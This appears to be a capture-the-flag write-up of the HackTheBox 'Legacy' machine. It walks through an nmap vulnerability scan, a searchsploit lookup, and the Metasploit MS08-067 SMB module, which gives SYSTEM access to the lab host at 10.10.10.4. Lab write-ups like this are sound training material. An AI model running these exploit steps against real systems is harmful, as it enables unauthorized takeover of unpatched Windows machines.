HackTheBox – Legacy Writeup
HackTheBox – Legacy Writeup
Today we are gonna solve Legacy from hackthebox.eu. Legacy is an easy windows machine residing at the ip address 10.10.10.4 released on 15 July 2017. We use the exploit MS08-067 to attack this machine and gain system access. This machine is also vulnerable to MS17-010 Eternal Blue exploit.
Connecting to HTB Vpn:
1. First download the vpn file from the access page of hackthebox.eu
2. Open the .ovpn file in your terminal with the following command
openvpn yourname.ovpn
3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network
4. You can access the machine at 10.10.10.4
Attack:
1. First let’s scan pur target machine using the network scanner nmap with the following flag
nmap -sV -A -p- –script vuln 10.10.10.4
-sV : to know the service versions at different ports
-A : to get all the information about the system like os,build,traceroutes
-p-: to scan all 65535 ports
–script vuln : to see if the machine is vulnerable to any exploits
2. We get the following results showing that port 139 and 445 are open.
The nmap results also shows us that this machine is vulnerable to exploits such as MS08-067 and MS17-010
Certified Ethical Hacking
3. Let do a quick search on these exploit using google and searchsploit
searchsploit ms08-067
4. From the searchsploit results we can see that there is a metasploit module for MS08-067, so let’s fire up metasploit
msfconsole
5. Now lets search for the exploit in the metasploit database with the following command
search ms08-067
6. We can see that there is a single exploit and that too a remote code execution so let’s choose this one
use exploit/windows/smb/ms08-067_netapi
7. After choosing the exploit w have to set the remote port and remote hosts which are going to attack
set RHOST 10.10.10.4
set RPORT 445
8. You can check whether all the options are properly set
show options
9. Now lets run our exploit with the following command
exploit
10. Now we have a meterpreter shell on the system. Sometime it may take one to three tries for the exploit to work
11. You can who you are on the system by the meterpreter command
getuid
So now we are NT System that is we are the Administrator
12. After enumerating the system more you can see that the user flag is located in the desktop of the user john and the root flag is located at the desktop of the administrator
Thank You for Reading HackTheBox – Legacy Writeup
Don’t forget to check out our latest Blogs – HackTheBox – Sense Writeup